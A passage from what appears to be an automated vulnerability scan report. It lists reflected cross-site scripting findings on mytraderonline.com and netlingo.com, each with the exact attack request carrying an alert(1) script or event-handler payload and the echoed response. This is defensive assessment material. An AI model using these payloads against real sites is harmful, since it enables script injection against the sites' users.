Date: Tue, 25 Jan 2011 02:29:29 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26489


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/javascripte904d<script>alert(1)</script>f127adaefca/realmedia.js</span>
...[SNIP]...

4.1264. https://www.mytraderonline.com/myt/sign-in/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /myt/sign-in/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ac25<script>alert(1)</script>9d5249ed1b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myt8ac25<script>alert(1)</script>9d5249ed1b2/sign-in/ HTTP/1.1
Host: www.mytraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:08:47 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26478


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/myt8ac25<script>alert(1)</script>9d5249ed1b2/sign-in/</span>
...[SNIP]...

4.1265. https://www.mytraderonline.com/myt/sign-in/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /myt/sign-in/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7b9e<script>alert(1)</script>9cd61b35c5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myt/sign-inb7b9e<script>alert(1)</script>9cd61b35c5c/ HTTP/1.1
Host: www.mytraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:08:54 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26478


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/myt/sign-inb7b9e<script>alert(1)</script>9cd61b35c5c/</span>
...[SNIP]...

4.1266. https://www.mytraderonline.com/myt/sign-in/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.mytraderonline.com
Path:   /myt/sign-in/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be1d"%3balert(1)//85941d9f6ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5be1d";alert(1)//85941d9f6ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myt/sign-in/?5be1d"%3balert(1)//85941d9f6ff=1 HTTP/1.1
Host: www.mytraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:32 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 33916


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>MyTrader - Save, Modify, Delete Vehicles for Sale - TraderOnline.com</title>
   <meta name="description" content="U
...[SNIP]...
<SCRIPT>DisplayAds("traderonline","www.traderonline.com/", "", "", "?5be1d";alert(1)//85941d9f6ff=1&","Right1","0","0")</SCRIPT>
...[SNIP]...

4.1267. http://www.netlingo.com/add-edit/editor-guidelines.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /add-edit/editor-guidelines.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e7db"-alert(1)-"eeac52a4325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /add-edit/editor-guidelines.php?2e7db"-alert(1)-"eeac52a4325=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
ingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/add-edit/editor-guidelines.php?2e7db"-alert(1)-"eeac52a4325=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1268. http://www.netlingo.com/advertise/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /advertise/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45d9e"-alert(1)-"9ac9b45a4e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/index.php?45d9e"-alert(1)-"9ac9b45a4e8=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/advertise/index.php?45d9e"-alert(1)-"9ac9b45a4e8=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1269. http://www.netlingo.com/advertise/licensing.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /advertise/licensing.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6d4f"-alert(1)-"7a919b369a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/licensing.php?e6d4f"-alert(1)-"7a919b369a3=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
ww.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/advertise/licensing.php?e6d4f"-alert(1)-"7a919b369a3=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1270. http://www.netlingo.com/advertise/payments.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /advertise/payments.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24c1b"-alert(1)-"e08311d27ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/payments.php?24c1b"-alert(1)-"e08311d27ec=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/advertise/payments.php?24c1b"-alert(1)-"e08311d27ec=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1271. http://www.netlingo.com/advertise/sponsorships.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /advertise/sponsorships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26131"-alert(1)-"c40e7e0c170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/sponsorships.php?26131"-alert(1)-"c40e7e0c170=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/advertise/sponsorships.php?26131"-alert(1)-"c40e7e0c170=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1272. http://www.netlingo.com/by-category/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /by-category/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 587c9"-alert(1)-"4286caef72b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /by-category/index.php?587c9"-alert(1)-"4286caef72b=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
/www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/by-category/index.php?587c9"-alert(1)-"4286caef72b=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1273. http://www.netlingo.com/change-password.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /change-password.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eccc"><img%20src%3da%20onerror%3dalert(1)>27cd0dda0c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4eccc\"><img src=a onerror=alert(1)>27cd0dda0c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /change-password.php?4eccc"><img%20src%3da%20onerror%3dalert(1)>27cd0dda0c4=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=q604f4d81hs3dk4e8nsfl2k781; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="ref" value="change-password?4eccc\"><img src=a onerror=alert(1)>27cd0dda0c4=1" />
...[SNIP]...

4.1274. http://www.netlingo.com/contact/contact-us.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /contact/contact-us.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a85cc"-alert(1)-"f9a7aeb155d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact/contact-us.php?a85cc"-alert(1)-"f9a7aeb155d=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/contact/contact-us.php?a85cc"-alert(1)-"f9a7aeb155d=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1275. http://www.netlingo.com/contact/faq.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /contact/faq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22223"-alert(1)-"926fba7f330 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact/faq.php?22223"-alert(1)-"926fba7f330=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 51013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/contact/faq.php?22223"-alert(1)-"926fba7f330=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1276. http://www.netlingo.com/contact/linktonetlingo.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /contact/linktonetlingo.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdcfe"-alert(1)-"3c43700b473 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact/linktonetlingo.php?fdcfe"-alert(1)-"3c43700b473=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/contact/linktonetlingo.php?fdcfe"-alert(1)-"3c43700b473=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1277. http://www.netlingo.com/decisions.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /decisions.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21eb3"><img%20src%3da%20onerror%3dalert(1)>3fdcc674bb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21eb3\"><img src=a onerror=alert(1)>3fdcc674bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /decisions.php?21eb3"><img%20src%3da%20onerror%3dalert(1)>3fdcc674bb2=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=nntluhfmkvfus6vk0cg7646qb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="ref" value="decisions?21eb3\"><img src=a onerror=alert(1)>3fdcc674bb2=1" />
...[SNIP]...

4.1278. http://www.netlingo.com/hello/welcome.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /hello/welcome.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8babd"-alert(1)-"0dc6ee6e46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hello/welcome.php?8babd"-alert(1)-"0dc6ee6e46a=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
tp://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/hello/welcome.php?8babd"-alert(1)-"0dc6ee6e46a=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1279. http://www.netlingo.com/iphone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /iphone

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82dd9"-alert(1)-"0fc7f046bae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iphone?82dd9"-alert(1)-"0fc7f046bae=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32407


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
<
...[SNIP]...
                           tb_open_new('http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           $("#send_page").click(function() {
                               data    =    "page_name=/iphone/?82dd9"-alert(1)-"0fc7f046bae=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1280. http://www.netlingo.com/iphone/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /iphone/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e3e8"-alert(1)-"71b86919983 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iphone/?4e3e8"-alert(1)-"71b86919983=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32407


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!--Programming, Authoring, and Design by Erin Jansen and Vincent James, NetLingo.com is copyrighted and trademarked -->
<head>
<
...[SNIP]...
                           tb_open_new('http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           $("#send_page").click(function() {
                               data    =    "page_name=/iphone/?4e3e8"-alert(1)-"71b86919983=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1281. http://www.netlingo.com/iphone/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /iphone/index.php

Issue detail

